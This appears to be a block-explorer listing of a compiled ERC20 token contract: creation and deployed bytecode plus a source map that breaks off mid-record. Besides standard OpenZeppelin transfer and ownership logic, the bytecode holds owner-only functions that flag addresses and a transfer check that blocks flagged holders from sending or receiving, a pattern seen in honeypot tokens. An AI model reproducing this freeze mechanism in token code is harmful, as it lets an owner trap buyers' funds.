508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e5f9190611218565b60405180910390a3610e7284848461103e565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610fdd5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110395760011515600760009054906101000a900460ff16151514611038576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102f90611a3c565b60405180910390fd5b5b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561107d578082015181840152602081019050611062565b60008484015250505050565b6000601f19601f8301169050919050565b60006110a582611043565b6110af818561104e565b93506110bf81856020860161105f565b6110c881611089565b840191505092915050565b600060208201905081810360008301526110ed818461109a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061112a826110ff565b9050919050565b61113a8161111f565b811461114557600080fd5b50565b60008135905061115781611131565b92915050565b6000819050919050565b6111708161115d565b811461117b57600080fd5b50565b60008135905061118d81611167565b92915050565b600080604083850312156111aa576111a96110f5565b5b60006111b885828601611148565b92505060206111c98582860161117e565b9150509250929050565b60008115159050919050565b6111e8816111d3565b82525050565b600060208201905061120360008301846111df565b92915050565b6112128161115d565b82525050565b600060208201905061122d6000830184611209565b92915050565b600060208284031215611249576112486110f5565b5b600061125784828501611148565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261128557611284611260565b5b8235905067ffffffffffffffff8111156112a2576112a1611265565b5b6020830191508360208202830111156112be576112bd61126a565b5b9250929050565b600080602083850312156112dc576112db6110f5565b5b600083013567ffffffffffffffff8111156112fa576112f96110fa565b5b6113068582860161126f565b92509250509250929050565b60008060006060848603121561132b5761132a6110f5565b5b600061133986828701611148565b935050602061134a86828701611148565b925050604061135b8682870161117e565b9150509250925092565b600060ff82169050919050565b61137b81611365565b82525050565b60006020820190506113966000830184611372565b92915050565b6113a58161111f565b82525050565b60006020820190506113c0600083018461139c565b92915050565b600080604083850312156113dd576113dc6110f5565b5b60006113eb85828601611148565b92505060206113fc85828601611148565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061144d57607f821691505b6020821081036114605761145f611406565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114cf8261115d565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361150157611500611495565b5b600182019050919050565b60006115178261115d565b91506115228361115d565b925082820190508082111561153a57611539611495565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061159c60258361104e565b91506115a782611540565b604082019050919050565b600060208201905081810360008301526115cb8161158f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061162e60268361104e565b9150611639826115d2565b604082019050919050565b6000602082019050818103600083015261165d81611621565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116c060248361104e565b91506116cb82611664565b604082019050919050565b600060208201905081810360008301526116ef816116b3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061175260228361104e565b915061175d826116f6565b604082019050919050565b6000602082019050818103600083015261178181611745565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006117be60208361104e565b91506117c982611788565b602082019050919050565b600060208201905081810360008301526117ed816117b1565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061182a601d8361104e565b9150611835826117f4565b602082019050919050565b600060208201905081810360008301526118598161181d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006118bc60258361104e565b91506118c782611860565b604082019050919050565b600060208201905081810360008301526118eb816118af565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061194e60238361104e565b9150611959826118f2565b604082019050919050565b6000602082019050818103600083015261197d81611941565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119e060268361104e565b91506119eb82611984565b604082019050919050565b60006020820190508181036000830152611a0f816119d3565b9050919050565b50565b6000611a2660008361104e565b9150611a3182611a16565b600082019050919050565b60006020820190508181036000830152611a5581611a19565b905091905056fea26469706673582212203fcf956fa3e82d45e20c1e302f664e2d024e257a68b79d821cfca3b32d4195e064736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102bc578063a9059cbb146102ec578063dd62ed3e1461031c578063f2fde38b1461034c578063fe701cd5146103685761010b565b806370a0823114610246578063715018a6146102765780638da5cb5b1461028057806395d89b411461029e5761010b565b80631c68dbaa116100de5780631c68dbaa146101ac57806323b872dd146101c8578063313ce567146101f857806339509351146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e5780631c33c1991461017c575b600080fd5b610118610384565b60405161012591906110d3565b60405180910390f35b61014860048036038101906101439190611193565b610416565b60405161015591906111ee565b60405180910390f35b610166610439565b6040516101739190611218565b60405180910390f35b61019660048036038101906101919190611233565b610443565b6040516101a391906111ee565b60405180910390f35b6101c660048036038101906101c191906112c5565b610499565b005b6101e260048036038101906101dd9190611312565b61054c565b6040516101ef91906111ee565b60405180910390f35b61020061057b565b60405161020d9190611381565b60405180910390f35b610230600480360381019061022b9190611193565b610584565b60405161023d91906111ee565b60405180910390f35b610260600480360381019061025b9190611233565b6105bb565b60405161026d9190611218565b60405180910390f35b61027e610604565b005b610288610618565b60405161029591906113ab565b60405180910390f35b6102a6610641565b6040516102b391906110d3565b60405180910390f35b6102d660048036038101906102d19190611193565b6106d3565b6040516102e391906111ee565b60405180910390f35b61030660048036038101906103019190611193565b61074a565b60405161031391906111ee565b60405180910390f35b610336600480360381019061033191906113c6565b61076d565b6040516103439190611218565b60405180910390f35b61036660048036038101906103619190611233565b6107f4565b005b610382600480360381019061037d91906112c5565b610877565b005b60606005805461039390611435565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf90611435565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600080610421610924565b905061042e81858561092c565b600191505092915050565b6000600454905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6104a1610af5565b60005b82829050811015610547576000600260008585858181106104c8576104c7611466565b5b90506020020160208101906104dd9190611233565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550806001019050808061053f906114c4565b9150506104a4565b505050565b600080610557610924565b9050610564858285610b73565b61056f858585610bff565b60019150509392505050565b60006012905090565b60008061058f610924565b90506105b08185856105a1858961076d565b6105ab919061150c565b61092c565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61060c610af5565b6106166000610e78565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461065090611435565b80601f016020809104026020016040519081016040528092919081815260200182805461067c90611435565b80156106c95780601f1061069e576101008083540402835291602001916106c9565b820191906000526020600020905b8154815290600101906020018083116106ac57829003601f168201915b5050505050905090565b6000806106de610924565b905060006106ec828661076d565b905083811015610731576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610728906115b2565b60405180910390fd5b61073e828686840361092c565b60019250505092915050565b600080610755610924565b9050610762818585610bff565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107fc610af5565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361086b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086290611644565b60405180910390fd5b61087481610e78565b50565b61087f610af5565b60005b8282905081101561091f576001600260008585858181106108a6576108a5611466565b5b90506020020160208101906108bb9190611233565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610917906114c4565b915050610882565b505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361099b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610992906116d6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0190611768565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ae89190611218565b60405180910390a3505050565b610afd610924565b73ffffffffffffffffffffffffffffffffffffffff16610b1b610618565b73ffffffffffffffffffffffffffffffffffffffff1614610b71576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b68906117d4565b60405180910390fd5b565b6000610b7f848461076d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bf95781811015610beb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be290611840565b60405180910390fd5b610bf8848484840361092c565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c65906118d2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cdd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cd490611964565b60405180910390fd5b610ce8838383610f3c565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d6f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d66906119f6565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e5f9190611218565b60405180910390a3610e7284848461103e565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610fdd5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110395760011515600760009054906101000a900460ff16151514611038576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102f90611a3c565b60405180910390fd5b5b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561107d578082015181840152602081019050611062565b60008484015250505050565b6000601f19601f8301169050919050565b60006110a582611043565b6110af818561104e565b93506110bf81856020860161105f565b6110c881611089565b840191505092915050565b600060208201905081810360008301526110ed818461109a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061112a826110ff565b9050919050565b61113a8161111f565b811461114557600080fd5b50565b60008135905061115781611131565b92915050565b6000819050919050565b6111708161115d565b811461117b57600080fd5b50565b60008135905061118d81611167565b92915050565b600080604083850312156111aa576111a96110f5565b5b60006111b885828601611148565b92505060206111c98582860161117e565b9150509250929050565b60008115159050919050565b6111e8816111d3565b82525050565b600060208201905061120360008301846111df565b92915050565b6112128161115d565b82525050565b600060208201905061122d6000830184611209565b92915050565b600060208284031215611249576112486110f5565b5b600061125784828501611148565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261128557611284611260565b5b8235905067ffffffffffffffff8111156112a2576112a1611265565b5b6020830191508360208202830111156112be576112bd61126a565b5b9250929050565b600080602083850312156112dc576112db6110f5565b5b600083013567ffffffffffffffff8111156112fa576112f96110fa565b5b6113068582860161126f565b92509250509250929050565b60008060006060848603121561132b5761132a6110f5565b5b600061133986828701611148565b935050602061134a86828701611148565b925050604061135b8682870161117e565b9150509250925092565b600060ff82169050919050565b61137b81611365565b82525050565b60006020820190506113966000830184611372565b92915050565b6113a58161111f565b82525050565b60006020820190506113c0600083018461139c565b92915050565b600080604083850312156113dd576113dc6110f5565b5b60006113eb85828601611148565b92505060206113fc85828601611148565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061144d57607f821691505b6020821081036114605761145f611406565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114cf8261115d565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361150157611500611495565b5b600182019050919050565b60006115178261115d565b91506115228361115d565b925082820190508082111561153a57611539611495565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061159c60258361104e565b91506115a782611540565b604082019050919050565b600060208201905081810360008301526115cb8161158f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061162e60268361104e565b9150611639826115d2565b604082019050919050565b6000602082019050818103600083015261165d81611621565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116c060248361104e565b91506116cb82611664565b604082019050919050565b600060208201905081810360008301526116ef816116b3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061175260228361104e565b915061175d826116f6565b604082019050919050565b6000602082019050818103600083015261178181611745565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006117be60208361104e565b91506117c982611788565b602082019050919050565b600060208201905081810360008301526117ed816117b1565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061182a601d8361104e565b9150611835826117f4565b602082019050919050565b600060208201905081810360008301526118598161181d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006118bc60258361104e565b91506118c782611860565b604082019050919050565b600060208201905081810360008301526118eb816118af565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061194e60238361104e565b9150611959826118f2565b604082019050919050565b6000602082019050818103600083015261197d81611941565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119e060268361104e565b91506119eb82611984565b604082019050919050565b60006020820190508181036000830152611a0f816119d3565b9050919050565b50565b6000611a2660008361104e565b9150611a3182611a16565b600082019050919050565b60006020820190508181036000830152611a5581611a19565b905091905056fea26469706673582212203fcf956fa3e82d45e20c1e302f664e2d024e257a68b79d821cfca3b32d4195e064736f6c63430008120033

Deployed Bytecode Sourcemap

20505:139:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8686:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11593:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10362:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10192:105;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9953:231;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12374:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9648:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13078:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10533:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5799:103;;;:::i;:::-;;5158:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8905:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13819:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10866:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11122:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6057:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9749:196;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8686:100;8740:13;8773:5;8766:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8686:100;:::o;11593:201::-;11676:4;11693:13;11709:12;:10;:12::i;:::-;11693:28;;11732:32;11741:5;11748:7;11757:6;11732:8;:32::i;:::-;11782:4;11775:11;;;11593:201;;;;:::o;10362:108::-;10423:7;10450:12;;10443:19;;10362:108;:::o;10192:105::-;10248:4;10272:8;:17;10281:7;10272:17;;;;;;;;;;;;;;;;;;;;;;;;;10265:24;;10192:105;;;:::o;9953:231::-;5044:13;:11;:13::i;:::-;10042:9:::1;10037:140;10061:11;;:18;;10057:1;:22;10037:140;;;10128:5;10101:8;:24;10110:11;;10122:1;10110:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10101:24;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;10160:3;;;;;10081;;;;;:::i;:::-;;;;10037:140;;;;9953:231:::0;;:::o;12374:295::-;12505:4;12522:15;12540:12;:10;:12::i;:::-;12522:30;;12563:38;12579:4;12585:7;12594:6;12563:15;:38::i;:::-;12612:27;12622:4;12628:2;12632:6;12612:9;:27::i;:::-;12657:4;12650:11;;;12374:295;;;;;:::o;9648:93::-;9706:5;9731:2;9724:9;;9648:93;:::o;13078:238::-;13166:4;13183:13;13199:12;:10;:12::i;:::-;13183:28;;13222:64;13231:5;13238:7;13275:10;13247:25;13257:5;13264:7;13247:9;:25::i;:::-;:38;;;;:::i;:::-;13222:8;:64::i;:::-;13304:4;13297:11;;;13078:238;;;;:::o;10533:127::-;10607:7;10634:9;:18;10644:7;10634:18;;;;;;;;;;;;;;;;10627:25;;10533:127;;;:::o;5799:103::-;5044:13;:11;:13::i;:::-;5864:30:::1;5891:1;5864:18;:30::i;:::-;5799:103::o:0;5158:87::-;5204:7;5231:6;;;;;;;;;;;5224:13;;5158:87;:::o;8905:104::-;8961:13;8994:7;8987:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8905:104;:::o;13819:436::-;13912:4;13929:13;13945:12;:10;:12::i;:::-;13929:28;;13968:24;13995:25;14005:5;14012:7;13995:9;:25::i;:::-;13968:52;;14059:15;14039:16;:35;;14031:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;14152:60;14161:5;14168:7;14196:15;14177:16;:34;14152:8;:60::i;:::-;14243:4;14236:11;;;;13819:436;;;;:::o;10866:193::-;10945:4;10962:13;10978:12;:10;:12::i;:::-;10962:28;;11001;11011:5;11018:2;11022:6;11001:9;:28::i;:::-;11047:4;11040:11;;;10866:193;;;;:::o;11122:151::-;11211:7;11238:11;:18;11250:5;11238:18;;;;;;;;;;;;;;;:27;11257:7;11238:27;;;;;;;;;;;;;;;;11231:34;;11122:151;;;;:::o;6057:201::-;5044:13;:11;:13::i;:::-;6166:1:::1;6146:22;;:8;:22;;::::0;6138:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6222:28;6241:8;6222:18;:28::i;:::-;6057:201:::0;:::o;9749:196::-;5044:13;:11;:13::i;:::-;9836:9:::1;9831:107;9855:11;;:18;;9851:1;:22;9831:107;;;9922:4;9895:8;:24;9904:11;;9916:1;9904:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9895:24;;;;;;;;;;;;;;;;:31;;;;;;;;;;;;;;;;;;9875:3;;;;;:::i;:::-;;;;9831:107;;;;9749:196:::0;;:::o;3867:98::-;3920:7;3947:10;3940:17;;3867:98;:::o;17846:380::-;17999:1;17982:19;;:5;:19;;;17974:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18080:1;18061:21;;:7;:21;;;18053:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18164:6;18134:11;:18;18146:5;18134:18;;;;;;;;;;;;;;;:27;18153:7;18134:27;;;;;;;;;;;;;;;:36;;;;18202:7;18186:32;;18195:5;18186:32;;;18211:6;18186:32;;;;;;:::i;:::-;;;;;;;;17846:380;;;:::o;5323:132::-;5398:12;:10;:12::i;:::-;5387:23;;:7;:5;:7::i;:::-;:23;;;5379:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5323:132::o;18517:453::-;18652:24;18679:25;18689:5;18696:7;18679:9;:25::i;:::-;18652:52;;18739:17;18719:16;:37;18715:248;;18801:6;18781:16;:26;;18773:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18885:51;18894:5;18901:7;18929:6;18910:16;:25;18885:8;:51::i;:::-;18715:248;18641:329;18517:453;;;:::o;14725:840::-;14872:1;14856:18;;:4;:18;;;14848:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;14949:1;14935:16;;:2;:16;;;14927:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;15004:38;15025:4;15031:2;15035:6;15004:20;:38::i;:::-;15055:19;15077:9;:15;15087:4;15077:15;;;;;;;;;;;;;;;;15055:37;;15126:6;15111:11;:21;;15103:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;15243:6;15229:11;:20;15211:9;:15;15221:4;15211:15;;;;;;;;;;;;;;;:38;;;;15446:6;15429:9;:13;15439:2;15429:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;15496:2;15481:26;;15490:4;15481:26;;;15500:6;15481:26;;;;;;:::i;:::-;;;;;;;;15520:37;15540:4;15546:2;15550:6;15520:19;:37::i;:::-;14837:728;14725:840;;;:::o;6418:191::-;6492:16;6511:6;;;;;;;;;;;6492:25;;6537:8;6528:6;;:17;;;;;;;;;;;;;;;;;;6592:8;6561:40;;6582:8;6561:40;;;;;;;;;;;;6481:128;6418:191;:::o;19570:200::-;19700:8;:12;19709:2;19700:12;;;;;;;;;;;;;;;;;;;;;;;;;:30;;;;19716:8;:14;19725:4;19716:14;;;;;;;;;;;;;;;;;;;;;;;;;19700:30;19696:72;;;19759:4;19740:23;;:15;;;;;;;;;;;:23;;;19732:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;19696:72;19570:200;;;:::o;20374:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:329::-;3857:6;3906:2;3894:9;3885:7;3881:23;3877:32;3874:119;;;3912:79;;:::i;:::-;3874:119;4032:1;4057:53;4102:7;4093:6;4082:9;4078:22;4057:53;:::i;:::-;4047:63;;4003:117;3798:329;;;;:::o;4133:117::-;4242:1;4239;4232:12;4256:117;4365:1;4362;4355:12;4379:117;4488:1;4485;4478:12;4519:568;4592:8;4602:6;4652:3;4645:4;4637:6;4633:17;4629:27;4619:122;;4660:79;;:::i;:::-;4619:122;4773:6;4760:20;4750:30;;4803:18;4795:6;4792:30;4789:117;;;4825:79;;:::i;:::-;4789:117;4939:4;4931:6;4927:17;4915:29;;4993:3;4985:4;4977:6;4973:17;4963:8;4959:32;4956:41;4953:128;;;5000:79;;:::i;:::-;4953:128;4519:568;;;;;:::o;5093:559::-;5179:6;5187;5236:2;5224:9;5215:7;5211:23;5207:32;5204:119;;;5242:79;;:::i;:::-;5204:119;5390:1;5379:9;5375:17;5362:31;5420:18;5412:6;5409:30;5406:117;;;5442:79;;:::i;:::-;5406:117;5555:80;5627:7;5618:6;5607:9;5603:22;5555:80;:::i;:::-;5537:98;;;;5333:312;5093:559;;;;;:::o;5658:619::-;5735:6;5743;5751;5800:2;5788:9;5779:7;5775:23;5771:32;5768:119;;;5806:79;;:::i;:::-;5768:119;5926:1;5951:53;5996:7;5987:6;5976:9;5972:22;5951:53;:::i;:::-;5941:63;;5897:117;6053:2;6079:53;6124:7;6115:6;6104:9;6100:22;6079:53;:::i;:::-;6069:63;;6024:118;6181:2;6207:53;6252:7;6243:6;6232:9;6228: